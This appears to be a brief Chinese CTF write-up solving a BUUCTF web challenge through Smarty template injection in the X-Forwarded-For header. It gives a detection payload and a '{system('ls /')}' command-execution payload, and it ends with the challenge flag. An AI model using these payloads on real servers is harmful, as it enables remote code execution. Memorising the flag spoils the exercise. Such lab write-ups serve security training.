buuctf | CISCN2019华东南web11
SSTI服务器端模板注入(Smarty模块)
打开
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/e016341e64b3b0ec9c5a2403f588f190.png)
![index](https://i-blog.csdnimg.cn/blog_migrate/cb031f2cd76ed6008e36de78524bdb26.png)
右上角的ip,判断可能是 XFF
或client-ip
控制的,下面的 “Build With Smarty !”
,猜测可能存在Smarty模块类型的SSTI注入
burp抓包重放,添加行
X-Forwarded-For: {{7*7}}
![抓包重放](https://i-blog.csdnimg.cn/blog_migrate/d2c6754b3a8dce76a84090c45292429b.png)
存在SSTI漏洞
X-Forwarded-For: {system('ls /')}
![ls /](https://i-blog.csdnimg.cn/blog_migrate/ff402e3fb7d334c57b42454314b6d433.png)
得到flag
flag{34a8a3b3-fc8c-471b-b5cb-8782a05718e3}
![flag](https://i-blog.csdnimg.cn/blog_migrate/1be7615bc3c9930b51af67f04704a166.png)